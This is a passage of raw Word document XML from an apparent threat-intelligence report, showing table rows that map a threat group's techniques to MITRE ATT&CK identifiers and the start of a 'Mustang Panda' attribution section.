                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253C64AC" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Return data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AEF9862" w14:textId="21E6C738" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>And send message (conflated for brevity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="128F6655" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7D15B4" w14:textId="65105D73" w:rsidR="00345E09" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B680D2" w14:textId="518298F2" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6578B760" w14:textId="5679505D" w:rsidR="00345E09" w:rsidRPr="00EE77AD" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EE77AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1559.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE77AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Component Object Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="631FDBD4" w14:textId="2CDF3A8A" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58413AD1" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597A45DB" w14:textId="62E5FC68" w:rsidR="00345E09" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D6CBE8" w14:textId="23EE74E2" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48E26079" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRDefault="00EE77AD" w:rsidP="00EE77AD">
            <w:r w:rsidRPr="00EE77AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Outlook - Leverage </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Outlook.Application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> COM object for code execution </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45596BF5" w14:textId="2F9BD641" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w14:paraId="466E8750" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48CD34BE" w14:textId="3DE8C29D" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="036D4A93" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D28BF3" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel: Asymmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324F92A4" w14:textId="3AC96D72" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00ED5D68" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B95B3F" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EEE462C" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0606C800" w14:textId="6CF143BE" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D335C73" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00EF6B51" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w14:paraId="38DA8CD9" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1949D23F" w14:textId="3A3A0C80" w:rsidR="00EE77AD" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4013679F" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="437B0319" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6132A2BB" w14:textId="17AB304E" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E99D92A" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2D1C6B" w14:textId="3D1CE132" w:rsidR="00EE77AD" w:rsidRDefault="00ED5D68" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20A7E79A" w14:textId="7EC0C728" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646CB14C" w14:textId="77777777" w:rsidR="00EE77AD" w:rsidRPr="00B857D7" w:rsidRDefault="00EE77AD" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Return data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="66CDC0C4" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22557391" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433F4D5A" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E876111" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA3AE2E" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545DEEDB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A120B9" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7138E3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14A05AF2" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E690AA6" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="0077286F" w:rsidRDefault="00345E09" w:rsidP="00345E09"/>
    <w:p w14:paraId="4C1A4B26" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1DD15" w14:textId="5755B995" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc153480893"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mustang Panda</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="534B24CD" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="005B4630" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc153480894"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="55041266" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0129 - Mustang Panda is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842C76C" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is China</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E93115" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CCAF9"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D36BDA"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
